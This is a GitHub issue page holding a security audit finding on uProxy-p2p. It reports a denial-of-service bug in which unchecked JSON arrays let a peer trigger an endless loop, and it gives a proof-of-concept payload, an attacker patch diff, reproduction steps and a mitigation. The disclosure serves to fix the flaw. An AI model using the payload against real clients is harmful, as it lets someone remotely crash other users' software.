search

UWNetworksLab / uProxy-p2p

Internet without borders
https://www.uproxy.org/
Apache License 2.0
866 stars 180 forks source link

UP-01-002 DoS through insufficient JSON Type Verification #352

Open cure53 opened 10 years ago

cure53 commented 10 years ago

The files rtc-to-net.ts and socks-to-rtc.ts loop over an array that is received over the network as JSON - without checking that the array is not actually an object. By supplying a specifically crafted object, it is possible to remotely cause an endless loop:

PoC: { version: 1, messages: {length: 9007199254740992} }

To test this, one can modify the code using this JSON object whenever a sendSignalToPeer event is emitted. In our tests, when such a modified client connected to the server, this caused the server to loop for a few seconds before it was terminated by Chrome and had to be restarted manually.

Steps to reproduce:

_Attacker:_ Open the directory containing the chrome app, apply the following patch:

diff -rupN build/chrome/app/lib/socks-rtc/rtc-to-net/rtc-to-net.js build/chrome/app_manipulated/lib/socks-rtc/rtc-to-net/rtc-to-net.js
--- build/chrome/app/lib/socks-rtc/rtc-to-net/rtc-to-net.js    2014-08-25 10:23:33.636076223 +0200
+++ build/chrome/app_manipulated/lib/socks-rtc/rtc-to-net/rtc-to-net.js    2014-08-25 12:22:04.716132556 +0200
@@ -168,7 +168,7 @@ var RtcToNet;
                         peerId: peerId,
                         data: JSON.stringify({
                             version: 1,
-                            messages: queuedMessages
+                            messages: {length: 9007199254740992} /* causes infinite loop for the recipient */
                         })
                     });
                     queuedMessages = [];
diff -rupN build/chrome/app/lib/socks-rtc/socks-to-rtc/socks-to-rtc.js build/chrome/app_manipulated/lib/socks-rtc/socks-to-rtc/socks-to-rtc.js
--- build/chrome/app/lib/socks-rtc/socks-to-rtc/socks-to-rtc.js    2014-08-25 10:23:33.638076223 +0200
+++ build/chrome/app_manipulated/lib/socks-rtc/socks-to-rtc/socks-to-rtc.js    2014-08-25 12:23:13.930133104 +0200
@@ -49,7 +49,7 @@ var SocksToRTC;
                                 peerId: peerId,
                                 data: JSON.stringify({
                                     version: 1,
-                                    messages: queuedMessages
+                                    messages: {length: 9007199254740992} /* causes infinite loop for the recipient */
                                 })
                             });
                             queuedMessages = [];

_Attacker:_ Request permission to proxy from the victim _Victim:_ Grant permission to proxy _Attacker:_ Connect to proxy

To mitigate this issue, it should be verified that incoming JSON objects conform to the expected format. It might be an option to use the “conform” helper provided by freedom.js for that very purpose.

iislucas commented 10 years ago

Ooo! to avoid duplicating work, for networking code, please review the new branch that's about to land... https://github.com/uProxy/uproxy-networking/tree/iislucas-webrtc_pc3

Thanks!

iislucas commented 10 years ago

Nice find by the way!

cure53 commented 10 years ago

Aye, we shall ;) Thx!